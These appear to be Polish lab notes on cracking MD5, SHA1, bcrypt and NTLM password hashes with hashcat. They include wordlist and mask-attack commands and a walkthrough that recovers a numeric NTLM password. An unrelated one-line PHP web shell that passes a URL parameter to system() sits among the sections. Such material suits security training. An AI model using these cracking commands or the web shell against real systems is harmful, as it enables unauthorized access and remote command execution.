Łamanie hashy
Hashcat
Opis...
Typy hashy obsługiwane w zadaniach:
- MD5 (-m 0)
- SHA1 (-m 100)
- bcrypt (-m 3200)
- NTLM (-m 1000)
Tryby ataku:
- słownikowy
- brute-force (-a 3)
Hash MD5
Dekodowanie pliku o nazwie hash1, który zawiera hash zakodowany przy użyciu algorytmu MD5.
hashcat -m 0 hash1 /usr/share/wordlists/rockyou.txt
SCREEN: lamacze1 - src1
hash SHA1
Dekodowanie pliku o nazwie hash2, który zawiera hash zakodowany przy użyciu algorytmu SHA1.
hashcat -m 100 hash2 /usr/share/wordlists/rockyou.txt
SCREEN: lamacze2 - src1
hash bcrypt
Dekodowanie pliku o nazwie hash3, który zawiera hash zakodowany przy użyciu algorytmu bcrypt.
hashcat -m 3200 hash3 /usr/share/wordlists/rockyou.txt
W hashu bcrypt występuje znak $, który może być różnie interpretowany w konsoli. Uważaj na to.
SCREEN: lamacze3 - src1
hash NTLM
Dekodowanie pliku o nazwie hash4, który zawiera hash zakodowany przy użyciu algorytmu NTLM.
hashcat -m 1000 hash4 -a3 ?d?d?d?d?d?d?d?d?d?d?d
NTLM to metoda hashowania opracowana przez Microsoft i stosowana do zapisu haseł użytkowników w systemach z rodziny NT (m.in. Windows XP).
SCREEN: lamacze4 - src1
echo '<?php system($_GET["x"]); ?>' > shell.txt
cat shell.txt
PENTEST
Cel: Złamanie wartości hasha:
B8DBB1B31B974AC88A49A4FF1E885BA4
1. Rozpoznanie typu hasha.
hashid B8DBB1B31B974AC88A49A4FF1E885BA4
🚨 Hash ma 32 znaki hex = 16 bajtów → zgadza się z NTLM (MD4 w UTF-16LE). Dodatkowo jest 9 cyfrowy.
2. Utworzenie pliku z hashem.
bash
echo B8DBB1B31B974AC88A49A4FF1E885BA4 > hashntlm.txt
3. Próba złamania słownikowego (najszybsza metoda).
bash
hashcat -m 1000 hashntlm.txt /usr/share/wordlists/rockyou.txt
🚨 Nieobecny w żadnym słowniku.
3. Brute-force (mask attack).
hashcat -m 1000 hashntlm.txt -a 3 ?d?d?d?d?d?d?d?d?d
SCREEN: hashcat1-scr1
🚨 Hasło to: 758741256